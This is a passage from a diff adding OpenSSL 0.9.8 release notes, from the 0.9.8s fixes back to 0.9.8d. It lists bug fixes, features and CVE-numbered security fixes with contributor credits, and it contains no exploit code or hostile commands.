+     <seggelmann@fh-muenster.de> and Michael Tuexen <tuexen@fh-muenster.de>
+     for preparing the fix. (CVE-2011-4108)
+     [Robin Seggelmann, Michael Tuexen]
+
+  *) Stop policy check failure freeing same buffer twice. (CVE-2011-4109)
+     [Ben Laurie, Kasper <ekasper@google.com>]
+
+  *) Clear bytes used for block padding of SSL 3.0 records.
+     (CVE-2011-4576)
+     [Adam Langley (Google)]
+
+  *) Only allow one SGC handshake restart for SSL/TLS. Thanks to George
+     Kadianakis <desnacked@gmail.com> for discovering this issue and
+     Adam Langley for preparing the fix. (CVE-2011-4619)
+     [Adam Langley (Google)]
+ 
+  *) Prevent malformed RFC3779 data triggering an assertion failure.
+     Thanks to Andrew Chi, BBN Technologies, for discovering the flaw
+     and Rob Austein <sra@hactrn.net> for fixing it. (CVE-2011-4577)
+     [Rob Austein <sra@hactrn.net>]
+
+  *) Fix ssl_ciph.c set-up race.
+     [Adam Langley (Google)]
+
+  *) Fix spurious failures in ecdsatest.c.
+     [Emilia Käsper (Google)]
+
+  *) Fix the BIO_f_buffer() implementation (which was mixing different
+     interpretations of the '..._len' fields).
+     [Adam Langley (Google)]
+
+  *) Fix handling of BN_BLINDING: now BN_BLINDING_invert_ex (rather than
+     BN_BLINDING_invert_ex) calls BN_BLINDING_update, ensuring that concurrent
+     threads won't reuse the same blinding coefficients.
+
+     This also avoids the need to obtain the CRYPTO_LOCK_RSA_BLINDING
+     lock to call BN_BLINDING_invert_ex, and avoids one use of
+     BN_BLINDING_update for each BN_BLINDING structure (previously,
+     the last update always remained unused).
+     [Emilia Käsper (Google)]
+
+  *) Fix SSL memory handling for (EC)DH ciphersuites, in particular
+     for multi-threaded use of ECDH.
+     [Adam Langley (Google)]
+
+  *) Fix x509_name_ex_d2i memory leak on bad inputs.
+     [Bodo Moeller]
+
+  *) Add protection against ECDSA timing attacks as mentioned in the paper
+     by Billy Bob Brumley and Nicola Tuveri, see:
+
+	http://eprint.iacr.org/2011/232.pdf
+
+     [Billy Bob Brumley and Nicola Tuveri]
+
+ Changes between 0.9.8q and 0.9.8r [8 Feb 2011]
+
+  *) Fix parsing of OCSP stapling ClientHello extension. CVE-2011-0014
+     [Neel Mehta, Adam Langley, Bodo Moeller (Google)]
+
+  *) Fix bug in string printing code: if *any* escaping is enabled we must
+     escape the escape character (backslash) or the resulting string is
+     ambiguous.
+     [Steve Henson]
+
+ Changes between 0.9.8p and 0.9.8q [2 Dec 2010]
+
+  *) Disable code workaround for ancient and obsolete Netscape browsers
+     and servers: an attacker can use it in a ciphersuite downgrade attack.
+     Thanks to Martin Rex for discovering this bug. CVE-2010-4180
+     [Steve Henson]
+
+  *) Fixed J-PAKE implementation error, originally discovered by
+     Sebastien Martini, further info and confirmation from Stefan
+     Arentz and Feng Hao. Note that this fix is a security fix. CVE-2010-4252
+     [Ben Laurie]
+
+ Changes between 0.9.8o and 0.9.8p [16 Nov 2010]
+
+  *) Fix extension code to avoid race conditions which can result in a buffer
+     overrun vulnerability: resumed sessions must not be modified as they can
+     be shared by multiple threads. CVE-2010-3864
+     [Steve Henson]
+
+  *) Fix for double free bug in ssl/s3_clnt.c CVE-2010-2939
+     [Steve Henson]
+
+  *) Don't reencode certificate when calculating signature: cache and use
+     the original encoding instead. This makes signature verification of
+     some broken encodings work correctly.
+     [Steve Henson]
+
+  *) ec2_GF2m_simple_mul bugfix: compute correct result if the output EC_POINT
+     is also one of the inputs.
+     [Emilia Käsper <emilia.kasper@esat.kuleuven.be> (Google)]
+
+  *) Don't repeatedly append PBE algorithms to table if they already exist.
+     Sort table on each new add. This effectively makes the table read only
+     after all algorithms are added and subsequent calls to PKCS12_pbe_add
+     etc are non-op.
+     [Steve Henson]
+
+ Changes between 0.9.8n and 0.9.8o [01 Jun 2010]
+
+  [NB: OpenSSL 0.9.8o and later 0.9.8 patch levels were released after
+  OpenSSL 1.0.0.]
+
+  *) Correct a typo in the CMS ASN1 module which can result in invalid memory
+     access or freeing data twice (CVE-2010-0742)
+     [Steve Henson, Ronald Moesbergen <intercommit@gmail.com>]
+
+  *) Add SHA2 algorithms to SSL_library_init(). SHA2 is becoming far more
+     common in certificates and some applications which only call
+     SSL_library_init and not OpenSSL_add_all_algorithms() will fail.
+     [Steve Henson]
+
+  *) VMS fixes: 
+     Reduce copying into .apps and .test in makevms.com
+     Don't try to use blank CA certificate in CA.com
+     Allow use of C files from original directories in maketests.com
+     [Steven M. Schweda" <sms@antinode.info>]
+
+ Changes between 0.9.8m and 0.9.8n [24 Mar 2010]
+
+  *) When rejecting SSL/TLS records due to an incorrect version number, never
+     update s->server with a new major version number.  As of
+     - OpenSSL 0.9.8m if 'short' is a 16-bit type,
+     - OpenSSL 0.9.8f if 'short' is longer than 16 bits,
+     the previous behavior could result in a read attempt at NULL when
+     receiving specific incorrect SSL/TLS records once record payload
+     protection is active.  (CVE-2010-0740)
+     [Bodo Moeller, Adam Langley <agl@chromium.org>]
+
+  *) Fix for CVE-2010-0433 where some kerberos enabled versions of OpenSSL 
+     could be crashed if the relevant tables were not present (e.g. chrooted).
+     [Tomas Hoger <thoger@redhat.com>]
+
+ Changes between 0.9.8l and 0.9.8m [25 Feb 2010]
+
+  *) Always check bn_wexpend() return values for failure.  (CVE-2009-3245)
+     [Martin Olsson, Neel Mehta]
+
+  *) Fix X509_STORE locking: Every 'objs' access requires a lock (to
+     accommodate for stack sorting, always a write lock!).
+     [Bodo Moeller]
+
+  *) On some versions of WIN32 Heap32Next is very slow. This can cause
+     excessive delays in the RAND_poll(): over a minute. As a workaround
+     include a time check in the inner Heap32Next loop too.
+     [Steve Henson]
+
+  *) The code that handled flushing of data in SSL/TLS originally used the
+     BIO_CTRL_INFO ctrl to see if any data was pending first. This caused
+     the problem outlined in PR#1949. The fix suggested there however can
+     trigger problems with buggy BIO_CTRL_WPENDING (e.g. some versions
+     of Apache). So instead simplify the code to flush unconditionally.
+     This should be fine since flushing with no data to flush is a no op.
+     [Steve Henson]
+
+  *) Handle TLS versions 2.0 and later properly and correctly use the
+     highest version of TLS/SSL supported. Although TLS >= 2.0 is some way
+     off ancient servers have a habit of sticking around for a while...
+     [Steve Henson]
+
+  *) Modify compression code so it frees up structures without using the
+     ex_data callbacks. This works around a problem where some applications
+     call CRYPTO_cleanup_all_ex_data() before application exit (e.g. when
+     restarting) then use compression (e.g. SSL with compression) later.
+     This results in significant per-connection memory leaks and
+     has caused some security issues including CVE-2008-1678 and
+     CVE-2009-4355.
+     [Steve Henson]
+
+  *) Constify crypto/cast (i.e., <openssl/cast.h>): a CAST_KEY doesn't
+     change when encrypting or decrypting.
+     [Bodo Moeller]
+
+  *) Add option SSL_OP_LEGACY_SERVER_CONNECT which will allow clients to
+     connect and renegotiate with servers which do not support RI.
+     Until RI is more widely deployed this option is enabled by default.
+     [Steve Henson]
+
+  *) Add "missing" ssl ctrls to clear options and mode.
+     [Steve Henson]
+
+  *) If client attempts to renegotiate and doesn't support RI respond with
+     a no_renegotiation alert as required by RFC5746.  Some renegotiating
+     TLS clients will continue a connection gracefully when they receive
+     the alert. Unfortunately OpenSSL mishandled this alert and would hang
+     waiting for a server hello which it will never receive. Now we treat a
+     received no_renegotiation alert as a fatal error. This is because
+     applications requesting a renegotiation might well expect it to succeed
+     and would have no code in place to handle the server denying it so the
+     only safe thing to do is to terminate the connection.
+     [Steve Henson]
+
+  *) Add ctrl macro SSL_get_secure_renegotiation_support() which returns 1 if
+     peer supports secure renegotiation and 0 otherwise. Print out peer
+     renegotiation support in s_client/s_server.
+     [Steve Henson]
+
+  *) Replace the highly broken and deprecated SPKAC certification method with
+     the updated NID creation version. This should correctly handle UTF8.
+     [Steve Henson]
+
+  *) Implement RFC5746. Re-enable renegotiation but require the extension
+     as needed. Unfortunately, SSL3_FLAGS_ALLOW_UNSAFE_LEGACY_RENEGOTIATION
+     turns out to be a bad idea. It has been replaced by
+     SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION which can be set with
+     SSL_CTX_set_options(). This is really not recommended unless you
+     know what you are doing.
+     [Eric Rescorla <ekr@networkresonance.com>, Ben Laurie, Steve Henson]
+
+  *) Fixes to stateless session resumption handling. Use initial_ctx when
+     issuing and attempting to decrypt tickets in case it has changed during
+     servername handling. Use a non-zero length session ID when attempting
+     stateless session resumption: this makes it possible to determine if
+     a resumption has occurred immediately after receiving server hello
+     (several places in OpenSSL subtly assume this) instead of later in
+     the handshake.
+     [Steve Henson]
+
+  *) The functions ENGINE_ctrl(), OPENSSL_isservice(),
+     CMS_get1_RecipientRequest() and RAND_bytes() can return <=0 on error
+     fixes for a few places where the return code is not checked
+     correctly.
+     [Julia Lawall <julia@diku.dk>]
+
+  *) Add --strict-warnings option to Configure script to include devteam
+     warnings in other configurations.
+     [Steve Henson]
+
+  *) Add support for --libdir option and LIBDIR variable in makefiles. This
+     makes it possible to install openssl libraries in locations which
+     have names other than "lib", for example "/usr/lib64" which some
+     systems need.
+     [Steve Henson, based on patch from Jeremy Utley]
+
+  *) Don't allow the use of leading 0x80 in OIDs. This is a violation of
+     X690 8.9.12 and can produce some misleading textual output of OIDs.
+     [Steve Henson, reported by Dan Kaminsky]
+
+  *) Delete MD2 from algorithm tables. This follows the recommendation in
+     several standards that it is not used in new applications due to
+     several cryptographic weaknesses. For binary compatibility reasons
+     the MD2 API is still compiled in by default.
+     [Steve Henson]
+
+  *) Add compression id to {d2i,i2d}_SSL_SESSION so it is correctly saved
+     and restored.
+     [Steve Henson]
+
+  *) Rename uni2asc and asc2uni functions to OPENSSL_uni2asc and
+     OPENSSL_asc2uni conditionally on Netware platforms to avoid a name
+     clash.
+     [Guenter <lists@gknw.net>]
+
+  *) Fix the server certificate chain building code to use X509_verify_cert(),
+     it used to have an ad-hoc builder which was unable to cope with anything
+     other than a simple chain.
+     [David Woodhouse <dwmw2@infradead.org>, Steve Henson]
+
+  *) Don't check self signed certificate signatures in X509_verify_cert()
+     by default (a flag can override this): it just wastes time without
+     adding any security. As a useful side effect self signed root CAs
+     with non-FIPS digests are now usable in FIPS mode.
+     [Steve Henson]
+
+  *) In dtls1_process_out_of_seq_message() the check if the current message
+     is already buffered was missing. For every new message was memory
+     allocated, allowing an attacker to perform an denial of service attack
+     with sending out of seq handshake messages until there is no memory
+     left. Additionally every future messege was buffered, even if the
+     sequence number made no sense and would be part of another handshake.
+     So only messages with sequence numbers less than 10 in advance will be
+     buffered.  (CVE-2009-1378)
+     [Robin Seggelmann, discovered by Daniel Mentz] 	
+
+  *) Records are buffered if they arrive with a future epoch to be
+     processed after finishing the corresponding handshake. There is
+     currently no limitation to this buffer allowing an attacker to perform
+     a DOS attack with sending records with future epochs until there is no
+     memory left. This patch adds the pqueue_size() function to detemine
+     the size of a buffer and limits the record buffer to 100 entries.
+     (CVE-2009-1377)
+     [Robin Seggelmann, discovered by Daniel Mentz] 	
+
+  *) Keep a copy of frag->msg_header.frag_len so it can be used after the
+     parent structure is freed.  (CVE-2009-1379)
+     [Daniel Mentz] 	
+
+  *) Handle non-blocking I/O properly in SSL_shutdown() call.
+     [Darryl Miles <darryl-mailinglists@netbauds.net>]
+
+  *) Add 2.5.4.* OIDs
+     [Ilya O. <vrghost@gmail.com>]
+
+ Changes between 0.9.8k and 0.9.8l  [5 Nov 2009]
+
+  *) Disable renegotiation completely - this fixes a severe security
+     problem (CVE-2009-3555) at the cost of breaking all
+     renegotiation. Renegotiation can be re-enabled by setting
+     SSL3_FLAGS_ALLOW_UNSAFE_LEGACY_RENEGOTIATION in s3->flags at
+     run-time. This is really not recommended unless you know what
+     you're doing.
+     [Ben Laurie]
+
+ Changes between 0.9.8j and 0.9.8k  [25 Mar 2009]
+
+  *) Don't set val to NULL when freeing up structures, it is freed up by
+     underlying code. If sizeof(void *) > sizeof(long) this can result in
+     zeroing past the valid field. (CVE-2009-0789)
+     [Paolo Ganci <Paolo.Ganci@AdNovum.CH>]
+
+  *) Fix bug where return value of CMS_SignerInfo_verify_content() was not
+     checked correctly. This would allow some invalid signed attributes to
+     appear to verify correctly. (CVE-2009-0591)
+     [Ivan Nestlerode <inestlerode@us.ibm.com>]
+
+  *) Reject UniversalString and BMPString types with invalid lengths. This
+     prevents a crash in ASN1_STRING_print_ex() which assumes the strings have
+     a legal length. (CVE-2009-0590)
+     [Steve Henson]
+
+  *) Set S/MIME signing as the default purpose rather than setting it 
+     unconditionally. This allows applications to override it at the store
+     level.
+     [Steve Henson]
+
+  *) Permit restricted recursion of ASN1 strings. This is needed in practice
+     to handle some structures.
+     [Steve Henson]
+
+  *) Improve efficiency of mem_gets: don't search whole buffer each time
+     for a '\n'
+     [Jeremy Shapiro <jnshapir@us.ibm.com>]
+
+  *) New -hex option for openssl rand.
+     [Matthieu Herrb]
+
+  *) Print out UTF8String and NumericString when parsing ASN1.
+     [Steve Henson]
+
+  *) Support NumericString type for name components.
+     [Steve Henson]
+
+  *) Allow CC in the environment to override the automatically chosen
+     compiler. Note that nothing is done to ensure flags work with the
+     chosen compiler.
+     [Ben Laurie]
+
+ Changes between 0.9.8i and 0.9.8j  [07 Jan 2009]
+
+  *) Properly check EVP_VerifyFinal() and similar return values
+     (CVE-2008-5077).
+     [Ben Laurie, Bodo Moeller, Google Security Team]
+
+  *) Enable TLS extensions by default.
+     [Ben Laurie]
+
+  *) Allow the CHIL engine to be loaded, whether the application is
+     multithreaded or not. (This does not release the developer from the
+     obligation to set up the dynamic locking callbacks.)
+     [Sander Temme <sander@temme.net>]
+
+  *) Use correct exit code if there is an error in dgst command.
+     [Steve Henson; problem pointed out by Roland Dirlewanger]
+
+  *) Tweak Configure so that you need to say "experimental-jpake" to enable
+     JPAKE, and need to use -DOPENSSL_EXPERIMENTAL_JPAKE in applications.
+     [Bodo Moeller]
+
+  *) Add experimental JPAKE support, including demo authentication in
+     s_client and s_server.
+     [Ben Laurie]
+
+  *) Set the comparison function in v3_addr_canonize().
+     [Rob Austein <sra@hactrn.net>]
+
+  *) Add support for XMPP STARTTLS in s_client.
+     [Philip Paeps <philip@freebsd.org>]
+
+  *) Change the server-side SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG behavior
+     to ensure that even with this option, only ciphersuites in the
+     server's preference list will be accepted.  (Note that the option
+     applies only when resuming a session, so the earlier behavior was
+     just about the algorithm choice for symmetric cryptography.)
+     [Bodo Moeller]
+
+ Changes between 0.9.8h and 0.9.8i  [15 Sep 2008]
+
+  *) Fix NULL pointer dereference if a DTLS server received
+     ChangeCipherSpec as first record (CVE-2009-1386).
+     [PR #1679]
+
+  *) Fix a state transitition in s3_srvr.c and d1_srvr.c
+     (was using SSL3_ST_CW_CLNT_HELLO_B, should be ..._ST_SW_SRVR_...).
+     [Nagendra Modadugu]
+
+  *) The fix in 0.9.8c that supposedly got rid of unsafe
+     double-checked locking was incomplete for RSA blinding,
+     addressing just one layer of what turns out to have been
+     doubly unsafe triple-checked locking.
+
+     So now fix this for real by retiring the MONT_HELPER macro
+     in crypto/rsa/rsa_eay.c.
+
+     [Bodo Moeller; problem pointed out by Marius Schilder]
+
+  *) Various precautionary measures:
+
+     - Avoid size_t integer overflow in HASH_UPDATE (md32_common.h).
+
+     - Avoid a buffer overflow in d2i_SSL_SESSION() (ssl_asn1.c).
+       (NB: This would require knowledge of the secret session ticket key
+       to exploit, in which case you'd be SOL either way.)
+
+     - Change bn_nist.c so that it will properly handle input BIGNUMs
+       outside the expected range.
+
+     - Enforce the 'num' check in BN_div() (bn_div.c) for non-BN_DEBUG
+       builds.
+
+     [Neel Mehta, Bodo Moeller]
+
+  *) Allow engines to be "soft loaded" - i.e. optionally don't die if
+     the load fails. Useful for distros.
+     [Ben Laurie and the FreeBSD team]
+
+  *) Add support for Local Machine Keyset attribute in PKCS#12 files.
+     [Steve Henson]
+
+  *) Fix BN_GF2m_mod_arr() top-bit cleanup code.
+     [Huang Ying]
+
+  *) Expand ENGINE to support engine supplied SSL client certificate functions.
+
+     This work was sponsored by Logica.
+     [Steve Henson]
+
+  *) Add CryptoAPI ENGINE to support use of RSA and DSA keys held in Windows
+     keystores. Support for SSL/TLS client authentication too.
+     Not compiled unless enable-capieng specified to Configure.
+
+     This work was sponsored by Logica.
+     [Steve Henson]
+
+  *) Fix bug in X509_ATTRIBUTE creation: dont set attribute using
+     ASN1_TYPE_set1 if MBSTRING flag set. This bug would crash certain
+     attribute creation routines such as certifcate requests and PKCS#12
+     files.
+     [Steve Henson]
+
+ Changes between 0.9.8g and 0.9.8h  [28 May 2008]
+
+  *) Fix flaw if 'Server Key exchange message' is omitted from a TLS
+     handshake which could lead to a cilent crash as found using the
+     Codenomicon TLS test suite (CVE-2008-1672) 
+     [Steve Henson, Mark Cox]
+
+  *) Fix double free in TLS server name extensions which could lead to
+     a remote crash found by Codenomicon TLS test suite (CVE-2008-0891) 
+     [Joe Orton]
+
+  *) Clear error queue in SSL_CTX_use_certificate_chain_file()
+
+     Clear the error queue to ensure that error entries left from
+     older function calls do not interfere with the correct operation.
+     [Lutz Jaenicke, Erik de Castro Lopo]
+
+  *) Remove root CA certificates of commercial CAs:
+
+     The OpenSSL project does not recommend any specific CA and does not
+     have any policy with respect to including or excluding any CA.
+     Therefore it does not make any sense to ship an arbitrary selection
+     of root CA certificates with the OpenSSL software.
+     [Lutz Jaenicke]
+
+  *) RSA OAEP patches to fix two separate invalid memory reads.
+     The first one involves inputs when 'lzero' is greater than
+     'SHA_DIGEST_LENGTH' (it would read about SHA_DIGEST_LENGTH bytes
+     before the beginning of from). The second one involves inputs where
+     the 'db' section contains nothing but zeroes (there is a one-byte
+     invalid read after the end of 'db').
+     [Ivan Nestlerode <inestlerode@us.ibm.com>]
+
+  *) Partial backport from 0.9.9-dev:
+
+     Introduce bn_mul_mont (dedicated Montgomery multiplication
+     procedure) as a candidate for BIGNUM assembler implementation.
+     While 0.9.9-dev uses assembler for various architectures, only
+     x86_64 is available by default here in the 0.9.8 branch, and
+     32-bit x86 is available through a compile-time setting.
+
+     To try the 32-bit x86 assembler implementation, use Configure
+     option "enable-montasm" (which exists only for this backport).
+
+     As "enable-montasm" for 32-bit x86 disclaims code stability
+     anyway, in this constellation we activate additional code
+     backported from 0.9.9-dev for further performance improvements,
+     namely BN_from_montgomery_word.  (To enable this otherwise,
+     e.g. x86_64, try "-DMONT_FROM_WORD___NON_DEFAULT_0_9_8_BUILD".)
+
+     [Andy Polyakov (backport partially by Bodo Moeller)]
+
+  *) Add TLS session ticket callback. This allows an application to set
+     TLS ticket cipher and HMAC keys rather than relying on hardcoded fixed
+     values. This is useful for key rollover for example where several key
+     sets may exist with different names.
+     [Steve Henson]
+
+  *) Reverse ENGINE-internal logic for caching default ENGINE handles.
+     This was broken until now in 0.9.8 releases, such that the only way
+     a registered ENGINE could be used (assuming it initialises
+     successfully on the host) was to explicitly set it as the default
+     for the relevant algorithms. This is in contradiction with 0.9.7
+     behaviour and the documentation. With this fix, when an ENGINE is
+     registered into a given algorithm's table of implementations, the
+     'uptodate' flag is reset so that auto-discovery will be used next
+     time a new context for that algorithm attempts to select an
+     implementation.
+     [Ian Lister (tweaked by Geoff Thorpe)]
+
+  *) Backport of CMS code to OpenSSL 0.9.8. This differs from the 0.9.9
+     implemention in the following ways:
+
+     Lack of EVP_PKEY_ASN1_METHOD means algorithm parameters have to be
+     hard coded.
+
+     Lack of BER streaming support means one pass streaming processing is
+     only supported if data is detached: setting the streaming flag is
+     ignored for embedded content.
+
+     CMS support is disabled by default and must be explicitly enabled
+     with the enable-cms configuration option.
+     [Steve Henson]
+
+  *) Update the GMP engine glue to do direct copies between BIGNUM and
+     mpz_t when openssl and GMP use the same limb size. Otherwise the
+     existing "conversion via a text string export" trick is still used.
+     [Paul Sheer <paulsheer@gmail.com>]
+
+  *) Zlib compression BIO. This is a filter BIO which compressed and
+     uncompresses any data passed through it.
+     [Steve Henson]
+
+  *) Add AES_wrap_key() and AES_unwrap_key() functions to implement
+     RFC3394 compatible AES key wrapping.
+     [Steve Henson]
+
+  *) Add utility functions to handle ASN1 structures. ASN1_STRING_set0():
+     sets string data without copying. X509_ALGOR_set0() and
+     X509_ALGOR_get0(): set and retrieve X509_ALGOR (AlgorithmIdentifier)
+     data. Attribute function X509at_get0_data_by_OBJ(): retrieves data
+     from an X509_ATTRIBUTE structure optionally checking it occurs only
+     once. ASN1_TYPE_set1(): set and ASN1_TYPE structure copying supplied
+     data.
+     [Steve Henson]
+
+  *) Fix BN flag handling in RSA_eay_mod_exp() and BN_MONT_CTX_set()
+     to get the expected BN_FLG_CONSTTIME behavior.
+     [Bodo Moeller (Google)]
+  
+  *) Netware support:
+
+     - fixed wrong usage of ioctlsocket() when build for LIBC BSD sockets
+     - fixed do_tests.pl to run the test suite with CLIB builds too (CLIB_OPT)
+     - added some more tests to do_tests.pl
+     - fixed RunningProcess usage so that it works with newer LIBC NDKs too
+     - removed usage of BN_LLONG for CLIB builds to avoid runtime dependency
+     - added new Configure targets netware-clib-bsdsock, netware-clib-gcc,
+       netware-clib-bsdsock-gcc, netware-libc-bsdsock-gcc
+     - various changes to netware.pl to enable gcc-cross builds on Win32
+       platform
+     - changed crypto/bio/b_sock.c to work with macro functions (CLIB BSD)
+     - various changes to fix missing prototype warnings
+     - fixed x86nasm.pl to create correct asm files for NASM COFF output
+     - added AES, WHIRLPOOL and CPUID assembler code to build files
+     - added missing AES assembler make rules to mk1mf.pl
+     - fixed order of includes in apps/ocsp.c so that e_os.h settings apply
+     [Guenter Knauf <eflash@gmx.net>]
+
+  *) Implement certificate status request TLS extension defined in RFC3546.
+     A client can set the appropriate parameters and receive the encoded
+     OCSP response via a callback. A server can query the supplied parameters
+     and set the encoded OCSP response in the callback. Add simplified examples
+     to s_client and s_server.
+     [Steve Henson]
+
+ Changes between 0.9.8f and 0.9.8g  [19 Oct 2007]
+
+  *) Fix various bugs:
+     + Binary incompatibility of ssl_ctx_st structure
+     + DTLS interoperation with non-compliant servers
+     + Don't call get_session_cb() without proposed session
+     + Fix ia64 assembler code
+     [Andy Polyakov, Steve Henson]
+
+ Changes between 0.9.8e and 0.9.8f  [11 Oct 2007]
+
+  *) DTLS Handshake overhaul. There were longstanding issues with
+     OpenSSL DTLS implementation, which were making it impossible for
+     RFC 4347 compliant client to communicate with OpenSSL server.
+     Unfortunately just fixing these incompatibilities would "cut off"
+     pre-0.9.8f clients. To allow for hassle free upgrade post-0.9.8e
+     server keeps tolerating non RFC compliant syntax. The opposite is
+     not true, 0.9.8f client can not communicate with earlier server.
+     This update even addresses CVE-2007-4995.
+     [Andy Polyakov]
+
+  *) Changes to avoid need for function casts in OpenSSL: some compilers
+     (gcc 4.2 and later) reject their use.
+     [Kurt Roeckx <kurt@roeckx.be>, Peter Hartley <pdh@utter.chaos.org.uk>,
+      Steve Henson]
+  
+  *) Add RFC4507 support to OpenSSL. This includes the corrections in
+     RFC4507bis. The encrypted ticket format is an encrypted encoded
+     SSL_SESSION structure, that way new session features are automatically
+     supported.
+
+     If a client application caches session in an SSL_SESSION structure
+     support is transparent because tickets are now stored in the encoded
+     SSL_SESSION.
+     
+     The SSL_CTX structure automatically generates keys for ticket
+     protection in servers so again support should be possible
+     with no application modification.
+
+     If a client or server wishes to disable RFC4507 support then the option
+     SSL_OP_NO_TICKET can be set.
+
+     Add a TLS extension debugging callback to allow the contents of any client
+     or server extensions to be examined.
+
+     This work was sponsored by Google.
+     [Steve Henson]
+
+  *) Add initial support for TLS extensions, specifically for the server_name
+     extension so far.  The SSL_SESSION, SSL_CTX, and SSL data structures now
+     have new members for a host name.  The SSL data structure has an
+     additional member SSL_CTX *initial_ctx so that new sessions can be
+     stored in that context to allow for session resumption, even after the
+     SSL has been switched to a new SSL_CTX in reaction to a client's
+     server_name extension.
+
+     New functions (subject to change):
+
+         SSL_get_servername()
+         SSL_get_servername_type()
+         SSL_set_SSL_CTX()
+
+     New CTRL codes and macros (subject to change):
+
+         SSL_CTRL_SET_TLSEXT_SERVERNAME_CB
+                                 - SSL_CTX_set_tlsext_servername_callback()
+         SSL_CTRL_SET_TLSEXT_SERVERNAME_ARG
+                                      - SSL_CTX_set_tlsext_servername_arg()
+         SSL_CTRL_SET_TLSEXT_HOSTNAME           - SSL_set_tlsext_host_name()
+
+     openssl s_client has a new '-servername ...' option.
+
+     openssl s_server has new options '-servername_host ...', '-cert2 ...',
+     '-key2 ...', '-servername_fatal' (subject to change).  This allows
+     testing the HostName extension for a specific single host name ('-cert'
+     and '-key' remain fallbacks for handshakes without HostName
+     negotiation).  If the unrecogninzed_name alert has to be sent, this by
+     default is a warning; it becomes fatal with the '-servername_fatal'
+     option.
+
+     [Peter Sylvester,  Remy Allais, Christophe Renou, Steve Henson]
+
+  *) Add AES and SSE2 assembly language support to VC++ build.
+     [Steve Henson]
+
+  *) Mitigate attack on final subtraction in Montgomery reduction.
+     [Andy Polyakov]
+
+  *) Fix crypto/ec/ec_mult.c to work properly with scalars of value 0
+     (which previously caused an internal error).
+     [Bodo Moeller]
+
+  *) Squeeze another 10% out of IGE mode when in != out.
+     [Ben Laurie]
+
+  *) AES IGE mode speedup.
+     [Dean Gaudet (Google)]
+
+  *) Add the Korean symmetric 128-bit cipher SEED (see
+     http://www.kisa.or.kr/kisa/seed/jsp/seed_eng.jsp) and
+     add SEED ciphersuites from RFC 4162:
+
+        TLS_RSA_WITH_SEED_CBC_SHA      =  "SEED-SHA"
+        TLS_DHE_DSS_WITH_SEED_CBC_SHA  =  "DHE-DSS-SEED-SHA"
+        TLS_DHE_RSA_WITH_SEED_CBC_SHA  =  "DHE-RSA-SEED-SHA"
+        TLS_DH_anon_WITH_SEED_CBC_SHA  =  "ADH-SEED-SHA"
+
+     To minimize changes between patchlevels in the OpenSSL 0.9.8
+     series, SEED remains excluded from compilation unless OpenSSL
+     is configured with 'enable-seed'.
+     [KISA, Bodo Moeller]
+
+  *) Mitigate branch prediction attacks, which can be practical if a
+     single processor is shared, allowing a spy process to extract
+     information.  For detailed background information, see
+     http://eprint.iacr.org/2007/039 (O. Aciicmez, S. Gueron,
+     J.-P. Seifert, "New Branch Prediction Vulnerabilities in OpenSSL
+     and Necessary Software Countermeasures").  The core of the change
+     are new versions BN_div_no_branch() and
+     BN_mod_inverse_no_branch() of BN_div() and BN_mod_inverse(),
+     respectively, which are slower, but avoid the security-relevant
+     conditional branches.  These are automatically called by BN_div()
+     and BN_mod_inverse() if the flag BN_FLG_CONSTTIME is set for one
+     of the input BIGNUMs.  Also, BN_is_bit_set() has been changed to
+     remove a conditional branch.
+
+     BN_FLG_CONSTTIME is the new name for the previous
+     BN_FLG_EXP_CONSTTIME flag, since it now affects more than just
+     modular exponentiation.  (Since OpenSSL 0.9.7h, setting this flag
+     in the exponent causes BN_mod_exp_mont() to use the alternative
+     implementation in BN_mod_exp_mont_consttime().)  The old name
+     remains as a deprecated alias.
+
+     Similary, RSA_FLAG_NO_EXP_CONSTTIME is replaced by a more general
+     RSA_FLAG_NO_CONSTTIME flag since the RSA implementation now uses
+     constant-time implementations for more than just exponentiation.
+     Here too the old name is kept as a deprecated alias.
+
+     BN_BLINDING_new() will now use BN_dup() for the modulus so that
+     the BN_BLINDING structure gets an independent copy of the
+     modulus.  This means that the previous "BIGNUM *m" argument to
+     BN_BLINDING_new() and to BN_BLINDING_create_param() now
+     essentially becomes "const BIGNUM *m", although we can't actually
+     change this in the header file before 0.9.9.  It allows
+     RSA_setup_blinding() to use BN_with_flags() on the modulus to
+     enable BN_FLG_CONSTTIME.
+
+     [Matthew D Wood (Intel Corp)]
+
+  *) In the SSL/TLS server implementation, be strict about session ID
+     context matching (which matters if an application uses a single
+     external cache for different purposes).  Previously,
+     out-of-context reuse was forbidden only if SSL_VERIFY_PEER was
+     set.  This did ensure strict client verification, but meant that,
+     with applications using a single external cache for quite
+     different requirements, clients could circumvent ciphersuite
+     restrictions for a given session ID context by starting a session
+     in a different context.
+     [Bodo Moeller]
+
+  *) Include "!eNULL" in SSL_DEFAULT_CIPHER_LIST to make sure that
+     a ciphersuite string such as "DEFAULT:RSA" cannot enable
+     authentication-only ciphersuites.
+     [Bodo Moeller]
+
+  *) Update the SSL_get_shared_ciphers() fix CVE-2006-3738 which was
+     not complete and could lead to a possible single byte overflow
+     (CVE-2007-5135) [Ben Laurie]
+
+ Changes between 0.9.8d and 0.9.8e  [23 Feb 2007]
+
+  *) Since AES128 and AES256 (and similarly Camellia128 and
+     Camellia256) share a single mask bit in the logic of
+     ssl/ssl_ciph.c, the code for masking out disabled ciphers needs a
+     kludge to work properly if AES128 is available and AES256 isn't
+     (or if Camellia128 is available and Camellia256 isn't).
+     [Victor Duchovni]
+
+  *) Fix the BIT STRING encoding generated by crypto/ec/ec_asn1.c
+     (within i2d_ECPrivateKey, i2d_ECPKParameters, i2d_ECParameters):
+     When a point or a seed is encoded in a BIT STRING, we need to
+     prevent the removal of trailing zero bits to get the proper DER
+     encoding.  (By default, crypto/asn1/a_bitstr.c assumes the case
+     of a NamedBitList, for which trailing 0 bits need to be removed.)
+     [Bodo Moeller]
+
+  *) Have SSL/TLS server implementation tolerate "mismatched" record
+     protocol version while receiving ClientHello even if the
+     ClientHello is fragmented.  (The server can't insist on the
+     particular protocol version it has chosen before the ServerHello
+     message has informed the client about his choice.)
+     [Bodo Moeller]
+
+  *) Add RFC 3779 support.
+     [Rob Austein for ARIN, Ben Laurie]
+
+  *) Load error codes if they are not already present instead of using a
+     static variable. This allows them to be cleanly unloaded and reloaded.
+     Improve header file function name parsing.
+     [Steve Henson]
+
+  *) extend SMTP and IMAP protocol emulation in s_client to use EHLO
+     or CAPABILITY handshake as required by RFCs.
+     [Goetz Babin-Ebell]
+
+ Changes between 0.9.8c and 0.9.8d  [28 Sep 2006]
+
